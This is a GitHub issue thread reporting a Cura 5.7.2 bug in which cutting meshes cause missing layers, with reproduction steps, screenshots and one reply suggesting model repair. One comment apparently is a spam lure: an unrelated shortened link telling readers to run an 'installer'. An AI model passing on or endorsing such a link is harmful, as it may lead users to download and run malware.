### ISSUE TITLE
[5.7.2] Adding cutting meshes results in missing layers

### ISSUE THREAD

**Issue by vitorio55** [Ultimaker/Cura#19607]
### Cura Version

5.7.2

### Operating System

Windows 10

### Printer

Two Trees Bluer

### Reproduction steps

1. Import wood post model
2. Drag the wood post down so the base is excluded beneath the plate (see screenshot)
3. Add a cylindrical cutting mesh and configure according to screenshot
4. Replicate 2 more and drag the 3 cutting meshes to the top of the model
5. Slice

### Actual results

There are layers missing from the model in unexpected places (the wood post main body).
When I print the model it breaks during print because there are only some infill where some layers should be.

### Expected results

The cutting meshes at the top of the model should not impact the layers in other places.
If we import the wooden post model (also drag it down on step 2) and do not add the three cutting meshes at the top (skip reproduction steps 3 and 4) and slice it, all the layers are generated perfectly (see first screenshot).

### Add your .zip and screenshots here ⬇️
[00WoodPost_inf75pp_HOLES_BUG_PETG.zip](https://github.com/user-attachments/files/16842228/00WoodPost_inf75pp_HOLES_BUG_PETG.zip)

![no_holes_top_ok](https://github.com/user-attachments/assets/d62042bc-561f-4fac-864c-f84ddda09673)
![missing_layer](https://github.com/user-attachments/assets/bddfb1da-2948-4121-8f1c-9d03efd78e11)
![holes_top_1_not_ok](https://github.com/user-attachments/assets/ce6c07eb-4dbe-4211-bc05-3e285d3036fd)
![cutting_mesh_holes_config](https://github.com/user-attachments/assets/1660b4af-06bd-4531-a6a9-a8ded0c755d4)
![exclusion_zone_plate](https://github.com/user-attachments/assets/97c3ccd9-6ef4-4d43-883c-f71ecff1b062)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by GregValiant** [comment]
Thanks for the report.
The "missing layer" problem occurs 99.9% of the time because of an extra surface within the model that is fooling the slicer.  There are on-line model repair sites ( like [THIS ONE](https://formware.co/OnlineStlRepair) )  or you can get MS 3D Builder from the Microsoft store.  It's pretty good at repairing models and has decent tools for altering models.
If you post a project file I'll review it.  Without something to look at there isn't much we can do.
